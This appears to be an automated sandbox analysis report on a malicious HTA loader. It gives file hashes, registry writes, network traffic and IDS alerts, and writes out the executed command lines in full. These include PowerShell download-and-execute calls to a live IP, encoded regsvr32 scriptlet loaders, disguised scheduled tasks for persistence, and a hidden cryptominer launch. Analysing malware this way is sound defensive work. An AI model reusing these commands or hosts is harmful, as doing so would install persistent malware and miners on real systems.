| download: | checking.hta |
| Full analysis: | https://app.any.run/tasks/1838b417-4df5-4047-a8c8-d264dbb8c3a8 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | August 03, 2020, 06:32:57 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/html |
| File info: | HTML document, ASCII text |
| MD5: | 73AEF3D5CBC0E4DA2FCD422D992BE178 |
| SHA1: | 0FF349676ABAC0BBFC8C485968C6D366162626D8 |
| SHA256: | 604C2C2D46C1456D691D2F8AB3330C27C39E6872E99D3C64BA1A3475659DE05C |
| SSDEEP: | 12:r6Qclfhtxvsdj+cTPYsUMI4di9nJInppcgFcWZPvskc4ISOP:rspXOj+cTQsu+ilW1Fco8ktA |
| .html | | | HyperText Markup Language (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 552 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\checking.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 4294967295 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 656 | "C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337" /sc HOURLY /f /mo 22 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMAAuADYAOAAuADEANAA3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 684 | SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137" /sc HOURLY /f /mo 20 /tr "C:\Windows\System32\cmd.exe /c mshta http://asq.r77vh0.pw/win/checking.hta" | C:\Windows\system32\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1128 | "C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138" /sc HOURLY /f /mo 23 /tr "C:\Windows\System32\cmd.exe /c mshta https://asq.d6shiiwz.pw/win/hssl/d6.hta" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1540 | C:\Windows\System32\cmd.exe /c C:\Users\admin\AppData\Roaming\Microsoft\Network\PrivFalse.bat | C:\Windows\System32\cmd.exe | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1676 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -w hidden -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAwAC4ANgA4AC4AMQA0ADcALwB3AGkAbgAvADMAcAAvAHcAYQB0AGMAaABlAHIAXwBuAHAALgBwAHMAMQAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | regsvr32.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1688 | powershell -w 1 -e cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMAAuADYAOAAuADEANAA3AC8AdwBpAG4ALwBwAGgAcAAvAHcAYQB0AGMAaABlAHIALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1692 | "C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447" /sc HOURLY /f /mo 22 /tr "cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwBhAHMAcQAuAHIANwA3AHYAaAAwAC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1732 | "C:\Windows\system32\cmd.exe" /c powershell -c "start-process -FilePath "C:\Users\admin\AppData\Roaming\Java\java.exe" -WindowStyle Hidden" | C:\Windows\system32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1808 | powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('http://185.10.68.147/win/checking.ps1')) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (552) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
| (PID) Process: | (552) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 1 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (1808) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1808 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29MU9J2FV9II39PQ35R6.temp | — | |
MD5:— | SHA256:— | |||
| 1688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O67DON4YELVJJ7H9WE8G.temp | — | |
MD5:— | SHA256:— | |||
| 1676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTJHH8SXB74R3OJYIK4T.temp | — | |
MD5:— | SHA256:— | |||
| 2476 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2WKJM3SGAZUZ0T41SRHA.temp | — | |
MD5:— | SHA256:— | |||
| 2476 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 1808 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFd689e.TMP | binary | |
MD5:— | SHA256:— | |||
| 1688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 1676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFded2f.TMP | binary | |
MD5:— | SHA256:— | |||
| 1676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 2476 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe0ccd.TMP | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3488 | regsvr32.exe | GET | 200 | 185.10.68.147:80 | http://185.10.68.147/win/php/watcher.php | SC | xml | 606 b | malicious |
1676 | powershell.exe | GET | 200 | 185.10.68.147:80 | http://185.10.68.147/win/min/32.exe | SC | executable | 6.40 Mb | malicious |
1676 | powershell.exe | GET | 200 | 185.10.68.147:80 | http://185.10.68.147/win/3p/watcher_np.ps1 | SC | text | 2.37 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1808 | powershell.exe | 185.10.68.147:80 | — | Flokinet Ltd | SC | malicious |
1808 | powershell.exe | 185.10.68.147:443 | — | Flokinet Ltd | SC | malicious |
3488 | regsvr32.exe | 185.10.68.147:80 | — | Flokinet Ltd | SC | malicious |
1676 | powershell.exe | 185.10.68.147:80 | — | Flokinet Ltd | SC | malicious |
3720 | java.exe | 185.10.68.220:443 | eu.minerpool.pw | Flokinet Ltd | SC | suspicious |
Domain | IP | Reputation |
|---|---|---|
eu.minerpool.pw |
| suspicious |
PID | Process | Class | Message |
|---|---|---|---|
1808 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host PS1 Request |
1808 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] PowerShell.Script Request |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell NoProfile Command Received In Powershell Stagers |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell Hidden Window Command Common In Powershell Stagers M2 |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell NonInteractive Command Common In Powershell Stagers |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M1 |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell Base64 Encoded Content Command Common In Powershell Stagers M2 |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell DownloadFile Command Common In Powershell Stagers |
1808 | powershell.exe | A Network Trojan was detected | ET INFO PowerShell DownloadString Command Common In Powershell Stagers |
3488 | regsvr32.exe | A Network Trojan was detected | MALWARE [PTsecurity] VBS.Loader.Gen |